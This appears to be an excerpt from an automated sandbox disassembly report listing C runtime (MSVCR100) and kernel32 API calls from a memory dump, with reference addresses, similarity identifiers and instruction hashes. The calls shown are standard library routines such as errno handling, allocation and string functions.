                                                                                                          • _errno.MSVCR100(6FDF8810,00000010,6FDA8C0C,00000000,?,00000000,?,6FD8EF1C,?,6FD8EF38,0000000C), ref: 6FDF8748
                                                                                                          • _errno.MSVCR100(6FDF8810,00000010,6FDA8C0C,00000000,?,00000000,?,6FD8EF1C,?,6FD8EF38,0000000C), ref: 6FDF8767
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDF8810,00000010,6FDA8C0C,00000000,?,00000000,?,6FD8EF1C,?,6FD8EF38,0000000C), ref: 6FDF8772
                                                                                                          • _get_osfhandle.MSVCR100(?,6FDF8810,00000010,6FDA8C0C,00000000,?,00000000,?,6FD8EF1C,?,6FD8EF38,0000000C), ref: 6FDF87AE
                                                                                                          • FlushFileBuffers.KERNEL32(00000000,6FDF8810,00000010,6FDA8C0C,00000000,?,00000000,?,6FD8EF1C,?,6FD8EF38,0000000C), ref: 6FDF87B5
                                                                                                          • GetLastError.KERNEL32(?,6FD8EF1C,?,6FD8EF38,0000000C), ref: 6FDF87BF
                                                                                                          • __doserrno.MSVCR100(?,?,?,?,6FD8EF1C,?,6FD8EF38,0000000C), ref: 6FDF87D4
                                                                                                          • _errno.MSVCR100(6FDF8810,00000010,6FDA8C0C,00000000,?,00000000,?,6FD8EF1C,?,6FD8EF38,0000000C), ref: 6FDF87DE
                                                                                                          Similarity
                                                                                                          • API ID: _errno$BuffersErrorFileFlushLast__doserrno_get_osfhandle_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 3018510309-0
                                                                                                          • Opcode ID: 2af0c80c5ca0622c9f9bdc0b3fb7356e32faf129d85e29e92758a313a8110d09
                                                                                                          • Instruction ID: 0b0c1593c682e31f2adc5506d390d9229d7961e80931823d5a648600ea600c5e
                                                                                                          • Opcode Fuzzy Hash: 2af0c80c5ca0622c9f9bdc0b3fb7356e32faf129d85e29e92758a313a8110d09
                                                                                                          • Instruction Fuzzy Hash: 9111E17184A705DFDB80AF76C988B5D3770AF02368F024645D4306F2D0CBB8B9028BA2
                                                                                                          APIs
                                                                                                          • GetLastError.KERNEL32(6FD731F8,?,6FD8081A,6FE18032), ref: 6FD80700
                                                                                                          • __set_flsgetvalue.MSVCR100 ref: 6FD8070E
                                                                                                            • Part of subcall function 6FD80341: TlsGetValue.KERNEL32(?,6FD80713), ref: 6FD8034A
                                                                                                          • SetLastError.KERNEL32(00000000), ref: 6FD80720
                                                                                                          • _calloc_crt.MSVCR100(00000001,00000214), ref: 6FDA75B7
                                                                                                          • DecodePointer.KERNEL32(00000000), ref: 6FDA75D5
                                                                                                          • _initptd.MSVCR100(00000000,00000000), ref: 6FDA75E4
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6FDA75EB
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$CurrentDecodePointerThreadValue__set_flsgetvalue_calloc_crt_initptd
                                                                                                          • String ID:
                                                                                                          • API String ID: 242762301-0
                                                                                                          • Opcode ID: 0d8c1af519b5033f442e99f0ccbf15590634bfe2858f5433fd01175dd3a9dc5f
                                                                                                          • Instruction ID: 129b6c89198d2d311b3d84f84b72e91bcc555b2aabb4993e3f0e21ab4aff0c30
                                                                                                          • Opcode Fuzzy Hash: 0d8c1af519b5033f442e99f0ccbf15590634bfe2858f5433fd01175dd3a9dc5f
                                                                                                          • Instruction Fuzzy Hash: 25F02D33402F61ABE76227749C0DB5E3FD1AF43B717140216F535DA0C1DF21B4115AA4
                                                                                                          APIs
                                                                                                          • ?__ExceptionPtrCopy@@YAXPAXPBX@Z.MSVCR100(?,00000008,00000014,6FDC579F,?,?,?), ref: 6FDC6093
                                                                                                          • ?__ExceptionPtrDestroy@@YAXPAX@Z.MSVCR100(00000008,?,00000008,00000014,6FDC579F,?,?,?), ref: 6FDC609D
                                                                                                          • ??3@YAXPAX@Z.MSVCR100(00000008,00000008,?,00000008,00000014,6FDC579F,?,?,?), ref: 6FDC60A3
                                                                                                          • __uncaught_exception.MSVCR100 ref: 6FDC60AF
                                                                                                          • ?__ExceptionPtrCopy@@YAXPAXPBX@Z.MSVCR100(?,?), ref: 6FDC60C0
                                                                                                          • ?__ExceptionPtrRethrow@@YAXPBX@Z.MSVCR100(?,?,?), ref: 6FDC60CD
                                                                                                          • ?__ExceptionPtrDestroy@@YAXPAX@Z.MSVCR100(?,?,?,?), ref: 6FDC60DA
                                                                                                          • ?__ExceptionPtrDestroy@@YAXPAX@Z.MSVCR100(?), ref: 6FDC60EA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception$Destroy@@$Copy@@$??3@Rethrow@@__uncaught_exception
                                                                                                          • String ID:
                                                                                                          • API String ID: 2060748252-0
                                                                                                          • Opcode ID: 200972981e9ff94e12b66a2f94e1a3654d9be7ec0dfcf9e57fe17ba40959a197
                                                                                                          • Instruction ID: 4b6a36e53648036f5b42180c1c3895b5cdb7b2605d7e07ea4b3fbff70797e9f2
                                                                                                          • Opcode Fuzzy Hash: 200972981e9ff94e12b66a2f94e1a3654d9be7ec0dfcf9e57fe17ba40959a197
                                                                                                          • Instruction Fuzzy Hash: 7A017CB2C01318AADF80D7F48845BEDB77CAF05218F910656D5A4B30C0D778F60596B3
                                                                                                          APIs
                                                                                                          • __set_flsgetvalue.MSVCR100 ref: 6FDCC421
                                                                                                            • Part of subcall function 6FD80341: TlsGetValue.KERNEL32(?,6FD80713), ref: 6FD8034A
                                                                                                          • __get_tlsindex.MSVCR100 ref: 6FDCC426
                                                                                                          • ___fls_getvalue@4.MSVCR100(00000000), ref: 6FDCC42C
                                                                                                            • Part of subcall function 6FDCC6AA: TlsGetValue.KERNEL32(?), ref: 6FDCC6B8
                                                                                                          • __get_tlsindex.MSVCR100(?), ref: 6FDCC438
                                                                                                          • ___fls_setvalue@8.MSVCR100(00000000,?), ref: 6FDCC43E
                                                                                                            • Part of subcall function 6FDCC6CA: DecodePointer.KERNEL32(?,?), ref: 6FDCC6DB
                                                                                                          • GetLastError.KERNEL32 ref: 6FDCC447
                                                                                                          • ExitThread.KERNEL32 ref: 6FDCC44E
                                                                                                          • _freefls.MSVCR100(?), ref: 6FDCC46A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Value__get_tlsindex$DecodeErrorExitLastPointerThread___fls_getvalue@4___fls_setvalue@8__set_flsgetvalue_freefls
                                                                                                          • String ID:
                                                                                                          • API String ID: 392714122-0
                                                                                                          • Opcode ID: 91eb3f959b4c77bbeba206682e0d86c73b775b95e65c48e80fd5e28a1a3ebf23
                                                                                                          • Instruction ID: 0b944d5ebe2ef9354cfb2bbdbd4e750836304e81a72295bf9b2043bda28d74a8
                                                                                                          • Opcode Fuzzy Hash: 91eb3f959b4c77bbeba206682e0d86c73b775b95e65c48e80fd5e28a1a3ebf23
                                                                                                          • Instruction Fuzzy Hash: 3AF082744007C0AFDB84ABB1C948C1E3BADAF4535C310D014EA088B266DB34F4429AB2
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(000000FF,?,?,?,?,000000FF,?), ref: 6FE0027D
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(000000FF,?,?,?,?,000000FF,?), ref: 6FE00287
                                                                                                          • _errno.MSVCR100(000000FF,?,?,?,?,000000FF,?), ref: 6FE002B3
                                                                                                          • strrchr.MSVCR100(?,00000065,?,000000A3,000000FF,?,?,?,?,000000FF), ref: 6FE00347
                                                                                                          • memset.MSVCR100(?,00000030,00000000,000000A3,000000FF,?,?,?,?,000000FF,?), ref: 6FE004CF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfomemsetstrrchr
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 716319809-4108050209
                                                                                                          • Opcode ID: 6123f78e429a424b9027d14163421e0b8db07205c18fe15d44cbe51702e0ca1e
                                                                                                          • Instruction ID: f49a64e9c771246d58008e9f4c6626c8e7fbe87e7e20fb0a8b525a8c97d36ade
                                                                                                          • Opcode Fuzzy Hash: 6123f78e429a424b9027d14163421e0b8db07205c18fe15d44cbe51702e0ca1e
                                                                                                          • Instruction Fuzzy Hash: 89C146719043868FEB11DF68C88179E7FA1EF52308F34916ED6949B381D374AA61C7A1
                                                                                                          APIs
                                                                                                          • malloc.MSVCR100(?), ref: 6FDF2C41
                                                                                                          • _freea_s.MSVCR100(?), ref: 6FDF2C9D
                                                                                                          • _wcsicmp.MSVCR100(?,am/pm,?,?,?,?,?,?,00000000,?,6FDF34C9,?,?), ref: 6FDF2D58
                                                                                                          • _wcsicmp.MSVCR100(?,a/p,?,?,?,?,?,?,00000000,?,6FDF34C9,?,?), ref: 6FDF2D6E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsicmp$_freea_smalloc
                                                                                                          • String ID: a/p$am/pm
                                                                                                          • API String ID: 4283237980-3206640213
                                                                                                          • Opcode ID: bb166d0a13e14e204959b91b685990c70ef59638ce91aa96441dc8c635fea6fd
                                                                                                          • Instruction ID: 976b3fc4a18c583d72e30671b3d5b5a7a82783f9f7d14afe201117fac633a178
                                                                                                          • Opcode Fuzzy Hash: bb166d0a13e14e204959b91b685990c70ef59638ce91aa96441dc8c635fea6fd
                                                                                                          • Instruction Fuzzy Hash: 58B1E231942786CADB808F58C980FEA77B1FF5530EF62441AD551AF290E336B943CBA1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: '$@$g
                                                                                                          • API String ID: 0-3359089917
                                                                                                          • Opcode ID: fc322fa42c010efd94762e07ae6f31fa273a9a63b044b28d234036991f9f716e
                                                                                                          • Instruction ID: ac9c3df69480a903e1c66da76cb2e2f4b62b4751f66d355685eca215bc445b24
                                                                                                          • Opcode Fuzzy Hash: fc322fa42c010efd94762e07ae6f31fa273a9a63b044b28d234036991f9f716e
                                                                                                          • Instruction Fuzzy Hash: DAC16876C4432DCADBA09B64CC887D9B7B4AF55324F2002DAD468AB191D774BBC5CF90
                                                                                                          APIs
                                                                                                          • strlen.MSVCR100(6FDB3088), ref: 6FD82DDB
                                                                                                          • _get_printf_count_output.MSVCR100 ref: 6FD82E42
                                                                                                          • _errno.MSVCR100(?), ref: 6FD83D3A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_get_printf_count_outputstrlen
                                                                                                          • String ID: @$@$g
                                                                                                          • API String ID: 3252504771-3810856864
                                                                                                          • Opcode ID: bddc5b890515b342bdd55bf8670d85a22b32fc59fe6ea6c27636dd2a8ae975de
                                                                                                          • Instruction ID: 361ef81525e4bbeb4e005f419b784dd204afeecbe03ab40bbc3181996c2542b8
                                                                                                          • Opcode Fuzzy Hash: bddc5b890515b342bdd55bf8670d85a22b32fc59fe6ea6c27636dd2a8ae975de
                                                                                                          • Instruction Fuzzy Hash: 17A13BF1904368CEDBA18B24CD817D9B7B4AF45319F1041EAD66CA7281E734BAC5CF68
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?), ref: 6FDDC9CC
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?), ref: 6FDDC9D7
                                                                                                          • _isctype_l.MSVCR100(?,00000008,?), ref: 6FDDCA29
                                                                                                          • _errno.MSVCR100(000000FF,000000FF,?), ref: 6FDDCBD5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo_isctype_l
                                                                                                          • String ID: $$0
                                                                                                          • API String ID: 2492265471-389342756
                                                                                                          • Opcode ID: 3bcb1ac8a438c7cd59a15707ee7fb08715421f703e51acc5e3730df0ecbde461
                                                                                                          • Instruction ID: ca7cda58ba809a3a2a00b964766d47fc195ec407e60b3d5cb06c72668333bd0d
                                                                                                          • Opcode Fuzzy Hash: 3bcb1ac8a438c7cd59a15707ee7fb08715421f703e51acc5e3730df0ecbde461
                                                                                                          • Instruction Fuzzy Hash: C4A19B70C0935ADBDF55CFA8D9817EEBBB1AF05354F10025AF8A0A7290C370BA45CBA1
                                                                                                          APIs
                                                                                                          • atol.MSVCR100(6FD8EAA8,6FD8EAA8,00000010,FFFF0000,00000000,00000000), ref: 6FDAD469
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: atol
                                                                                                          • String ID: .$.$NULL$`non-type-template-parameter$`template-parameter
                                                                                                          • API String ID: 1464325613-3945972591
                                                                                                          • Opcode ID: 51dbd8fcd04a5a810b26fb130c161da7a2e2a5206b58c0e0ba427f3e08a08d80
                                                                                                          • Instruction ID: c7b5646f128faebae17dc20a015a48c4520f8c017a6b56878db7da2a8cd83d1c
                                                                                                          • Opcode Fuzzy Hash: 51dbd8fcd04a5a810b26fb130c161da7a2e2a5206b58c0e0ba427f3e08a08d80
                                                                                                          • Instruction Fuzzy Hash: 2071D271904708AADB90DBB8CC84BEEB77EBF02308F50485AE556A70C0DF75B944CB69
                                                                                                          APIs
                                                                                                            • Part of subcall function 6FD806FC: GetLastError.KERNEL32(6FD731F8,?,6FD8081A,6FE18032), ref: 6FD80700
                                                                                                            • Part of subcall function 6FD806FC: __set_flsgetvalue.MSVCR100 ref: 6FD8070E
                                                                                                            • Part of subcall function 6FD806FC: SetLastError.KERNEL32(00000000), ref: 6FD80720
                                                                                                          • _calloc_crt.MSVCR100(00000086,00000002), ref: 6FDFE3B5
                                                                                                            • Part of subcall function 6FDFC284: __sys_nerr.MSVCR100(?,?,6FDFC33C,00000000), ref: 6FDFC291
                                                                                                            • Part of subcall function 6FDFC284: __sys_nerr.MSVCR100(?,?,6FDFC33C,00000000), ref: 6FDFC29A
                                                                                                            • Part of subcall function 6FDFC284: __sys_errlist.MSVCR100(?,?,6FDFC33C,00000000), ref: 6FDFC2A1
                                                                                                          • mbstowcs_s.MSVCR100(00000000,?,00000086,00000000,00000085), ref: 6FDFE3E2
                                                                                                            • Part of subcall function 6FDDC408: _mbstowcs_s_l.MSVCR100(?,?,?,?,?,00000000), ref: 6FDDC41E
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDFE3F7
                                                                                                          • _errno.MSVCR100(?,?,6FDFC42B,00000000,?,00000000), ref: 6FDFE48D
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,6FDFC42B,00000000,?,00000000), ref: 6FDFE497
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast__sys_nerr$__set_flsgetvalue__sys_errlist_calloc_crt_errno_invalid_parameter_noinfo_invoke_watson_mbstowcs_s_lmbstowcs_s
                                                                                                          • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                          • API String ID: 2636177090-798102604
                                                                                                          APIs
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2959964966-0
                                                                                                          APIs
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2959964966-0
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?,00000016,?,?,?,?), ref: 6FE005E1
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,00000016,?,?,?,?), ref: 6FE005EB
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • strlen.MSVCR100(?,?,00000016,?,?), ref: 6FE0063D
                                                                                                          • memmove.MSVCR100(?,?,00000001,?,?,00000016,?,?), ref: 6FE00646
                                                                                                          • strlen.MSVCR100(?,?,00000016,?,?), ref: 6FE00661
                                                                                                          • memmove.MSVCR100(?,?,00000001,?,?,00000016,?,?), ref: 6FE0066A
                                                                                                          • memset.MSVCR100(?,00000030,00000000,?,00000016,?,?), ref: 6FE006A6
                                                                                                          Similarity
                                                                                                          • API ID: memmovestrlen$_errno_invalid_parameter_invalid_parameter_noinfomemset
                                                                                                          • String ID:
                                                                                                          • API String ID: 2621052104-0
                                                                                                          APIs
                                                                                                          • _malloc_crt.MSVCR100(00000054), ref: 6FD8BEFA
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: _malloc_crt
                                                                                                          • String ID: bad allocation$csm
                                                                                                          • API String ID: 2419877250-2003371537
                                                                                                          APIs
                                                                                                          • ??3@YAXPAX@Z.MSVCR100(?,00000008,6FDBFE54,00000004,6FDBFE1D), ref: 6FDBFEB6
                                                                                                          • ??3@YAXPAX@Z.MSVCR100(00000000), ref: 6FDBFF00
                                                                                                          • ??_V@YAXPAX@Z.MSVCR100(?,?,?,?,?,00000008,6FDBFE54,00000004,6FDBFE1D), ref: 6FDBFF14
                                                                                                          • ??_V@YAXPAX@Z.MSVCR100(?,?,?,?,?,?,00000008,6FDBFE54,00000004,6FDBFE1D), ref: 6FDBFF1C
                                                                                                          • TlsFree.KERNEL32(?,?,?,?,?,00000008,6FDBFE54,00000004,6FDBFE1D), ref: 6FDBFF26
                                                                                                          • ??3@YAXPAX@Z.MSVCR100(00000000,00000004,00000008,00000060,6FDC4B3C,?,?,?,?,00000008,6FDBFE54,00000004,6FDBFE1D), ref: 6FDBFF80
                                                                                                            • Part of subcall function 6FDC3731: InterlockedFlushSList.KERNEL32(?,?,6FDBFEB3,00000008,6FDBFE54,00000004,6FDBFE1D), ref: 6FDC373B
                                                                                                            • Part of subcall function 6FDC3731: InterlockedFlushSList.KERNEL32(?,?,6FDBFEB3,00000008,6FDBFE54,00000004,6FDBFE1D), ref: 6FDC3746
                                                                                                            • Part of subcall function 6FDC3731: ??_V@YAXPAX@Z.MSVCR100(?,00000000,?,6FDBFEB3,00000008,6FDBFE54,00000004,6FDBFE1D), ref: 6FDC377E
                                                                                                            • Part of subcall function 6FDC3731: ??3@YAXPAX@Z.MSVCR100(?,?,00000000,?,6FDBFEB3,00000008,6FDBFE54,00000004,6FDBFE1D), ref: 6FDC3784
                                                                                                            • Part of subcall function 6FDC3731: ??_V@YAXPAX@Z.MSVCR100(?,?,6FDBFEB3,00000008,6FDBFE54,00000004,6FDBFE1D), ref: 6FDC3795
                                                                                                          • InterlockedPopEntrySList.KERNEL32(6FE255D0,6FE255DC,?,?,?,?,00000008,6FDBFE54,00000004,6FDBFE1D), ref: 6FDBFF87
                                                                                                          Similarity
                                                                                                          • API ID: ??3@$InterlockedList$Flush$EntryFree
                                                                                                          • String ID:
                                                                                                          • API String ID: 1640940807-0
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(6FDFA4A0,00000010), ref: 6FDFA39E
                                                                                                          • _errno.MSVCR100(6FDFA4A0,00000010), ref: 6FDFA3A6
                                                                                                            • Part of subcall function 6FDF85A6: _get_osfhandle.MSVCR100(?,?,?,?,?,?,6FDAFDE3,?,00000000,00000000,00000002,?,00000002,?,?,6FD8ECE1), ref: 6FDF85BF
                                                                                                            • Part of subcall function 6FDF85A6: _errno.MSVCR100(?,?,?,?,?,6FDAFDE3,?,00000000,00000000,00000002,?,00000002,?,?,6FD8ECE1,?), ref: 6FDF85CC
                                                                                                          • __doserrno.MSVCR100(6FDFA4A0,00000010), ref: 6FDFA3C7
                                                                                                          • _errno.MSVCR100(6FDFA4A0,00000010), ref: 6FDFA3CE
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDFA4A0,00000010), ref: 6FDFA3D9
                                                                                                          Similarity
                                                                                                          • API ID: _errno$__doserrno$_get_osfhandle_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2674512625-0
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(6FDFA6E8,00000014), ref: 6FDFA5E8
                                                                                                          • _errno.MSVCR100(6FDFA6E8,00000014), ref: 6FDFA5F0
                                                                                                          • __doserrno.MSVCR100(6FDFA6E8,00000014), ref: 6FDFA613
                                                                                                          • _errno.MSVCR100(6FDFA6E8,00000014), ref: 6FDFA61A
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDFA6E8,00000014), ref: 6FDFA625
                                                                                                          • _errno.MSVCR100(6FDFA6E8,00000014), ref: 6FDFA6A6
                                                                                                          • __doserrno.MSVCR100(6FDFA6E8,00000014), ref: 6FDFA6B1
                                                                                                          Similarity
                                                                                                          • API ID: __doserrno_errno$_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2315031519-0
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(6FD96D68,00000010), ref: 6FD96CB9
                                                                                                          • __doserrno.MSVCR100(6FD96D68,00000010), ref: 6FDB056D
                                                                                                          • _errno.MSVCR100(6FD96D68,00000010), ref: 6FDB0575
                                                                                                          • _errno.MSVCR100(6FD96D68,00000010), ref: 6FDB058A
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FD96D68,00000010), ref: 6FDB0595
                                                                                                          • __doserrno.MSVCR100(6FD96D68,00000010), ref: 6FDB059C
                                                                                                          • _errno.MSVCR100(6FD96D68,00000010), ref: 6FDB05B2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __doserrno_errno$_invalid_parameter_noinfo
                                                                                                          APIs
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(6FDFA5B8,00000010), ref: 6FDFA4D0
                                                                                                          • _errno.MSVCR100(6FDFA5B8,00000010), ref: 6FDFA4D8
                                                                                                          • __doserrno.MSVCR100(6FDFA5B8,00000010), ref: 6FDFA4F7
                                                                                                          • _errno.MSVCR100(6FDFA5B8,00000010), ref: 6FDFA4FF
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDFA5B8,00000010), ref: 6FDFA50A
                                                                                                          • _errno.MSVCR100(6FDFA5B8,00000010), ref: 6FDFA57B
                                                                                                          • __doserrno.MSVCR100(6FDFA5B8,00000010), ref: 6FDFA586
                                                                                                          Similarity
                                                                                                          • API ID: __doserrno_errno$_invalid_parameter_noinfo
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(6FDF9EE0,00000010), ref: 6FDF9E09
                                                                                                          • __doserrno.MSVCR100(6FDF9EE0,00000010), ref: 6FDF9E25
                                                                                                          • _errno.MSVCR100(6FDF9EE0,00000010), ref: 6FDF9E2D
